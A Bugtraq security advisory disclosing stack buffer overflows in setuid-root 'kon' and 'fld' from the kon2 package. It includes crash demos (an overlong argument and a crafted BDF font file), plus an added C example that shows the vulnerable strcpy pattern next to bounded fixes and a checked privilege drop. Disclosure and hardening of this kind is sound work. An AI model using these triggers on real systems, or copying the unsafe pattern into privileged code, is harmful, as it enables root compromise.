Bugtraq mailing list archives

Problems with "kon2" package


From: chris () FERRET LMH OX AC UK (Chris Evans)
Date: Mon, 19 Jun 2000 23:51:53 +0100


Hi,

I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console, I'm led to believe.

SUMMARY
=======

kon2-0.3.9

In the version I briefly examined, there were three suid-root executables:

- kon
- fld
- newvc

Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified whether something has dropped
root privileges or not at the time of the overflows.

DEMOS
=====

No discussion of code flaws today, because boring stack overflows are
being used.

1) kon

kon VGA -StartupMessage `perl -e 'print "A"x10000'`

=> segfault with EIP 0x41414141

2) fld

a) Create file "read.me.and.die", contents:

CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"

...
BUT substitute each sequence of A's for 200 A's

b) fld -t bdf read.me.and.die

I don't get a clean 0x41414141 stack trace, but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted in between two char[] buffers on the stack).

Cheers
Chris
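Editor's added example (not Chris Evans' code and not kon2 source, which the post does not include). Both demos above are the same bug class: attacker-controlled text (an argv string, a quoted BDF property value) copied into a fixed-size stack buffer with no length check. The block below shows that pattern once for contrast, then the bounded replacements a setuid program should use, plus a root-dropping routine that verifies the drop actually happened, since the post leaves open whether kon/fld still hold root at the time of the overflow. All names, the buffer sizes `MSG_MAX`/`CHARSET_MAX`, and the BDF line format accepted by `parse_bdf_property` are assumptions for illustration; the 10000-byte and 200-byte inputs are constructed to mirror the two demos.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical buffer sizes; kon2's real sizes are not given in the post. */
#define MSG_MAX     256
#define CHARSET_MAX  64

/* VULNERABLE pattern behind demo 1: an argv string copied with strcpy() into
 * a fixed stack buffer.  A 10000-byte argument runs past 'msg' and over the
 * saved return address, hence EIP == 0x41414141.  Never call with untrusted input. */
void startup_message_unsafe(const char *arg)
{
    char msg[MSG_MAX];
    strcpy(msg, arg);
    puts(msg);
}

/* Hardened form: refuse input that does not fit instead of truncating
 * silently.  Returns 0 on success, -1 if the argument is too long. */
int startup_message_safe(const char *arg, char *out, size_t outsz)
{
    size_t n = strnlen(arg, outsz);
    if (n == outsz)          /* no NUL within outsz bytes: too long */
        return -1;
    memcpy(out, arg, n + 1);
    return 0;
}

/* Demo 2 pattern: a BDF-style property line such as
 *     CHARSET_REGISTRY"ISO8859"
 * The quoted value is copied into 'value' only if it fits: 0 / -1. */
int parse_bdf_property(const char *line, const char *key,
                       char *value, size_t valsz)
{
    size_t klen = strlen(key);
    if (strncmp(line, key, klen) != 0)
        return -1;
    const char *p = line + klen;
    while (*p == ' ' || *p == '\t')
        p++;
    if (*p++ != '"')
        return -1;
    const char *end = strchr(p, '"');
    if (end == NULL)
        return -1;
    size_t vlen = (size_t)(end - p);
    if (vlen >= valsz)       /* the 200-A case is rejected here */
        return -1;
    memcpy(value, p, vlen);
    value[vlen] = '\0';
    return 0;
}

/* Drop root before any untrusted input is parsed and verify the drop took
 * effect; forgetting this turns a plain crash into a root compromise. */
int drop_root(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (uid != 0 && (geteuid() != uid || setuid(0) == 0))
        return -1;           /* the drop silently failed */
    return 0;
}

/* Constructed inputs mirroring the two demos (not taken from kon2). */
int demo_startup_message(size_t arg_len)
{
    char msg[MSG_MAX];
    char *arg = malloc(arg_len + 1);
    if (arg == NULL) return -2;
    memset(arg, 'A', arg_len);
    arg[arg_len] = '\0';
    int rc = startup_message_safe(arg, msg, sizeof msg);
    free(arg);
    return rc;
}

int demo_bdf_value(size_t value_len)
{
    char line[512], value[CHARSET_MAX];
    if (value_len > sizeof line - 32) return -2;
    int off = snprintf(line, sizeof line, "CHARSET_REGISTRY\"");
    memset(line + off, 'A', value_len);
    snprintf(line + off + value_len, sizeof line - off - value_len, "\"");
    return parse_bdf_property(line, "CHARSET_REGISTRY", value, sizeof value);
}

int main(void)
{
    printf("10000-byte -StartupMessage: %d\n", demo_startup_message(10000));
    printf("200-byte CHARSET_REGISTRY:  %d\n", demo_bdf_value(200));
    return 0;
}
```

Rejecting oversized input outright (rather than truncating with strncpy) is deliberate: in a setuid program a silently truncated path or property name can itself become a logic bug, and a clean error is easy to audit. The `drop_root` check that `setuid(0)` now fails matters because `setuid()` can fail without the program noticing, leaving the parser running as root exactly as the post suspects.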

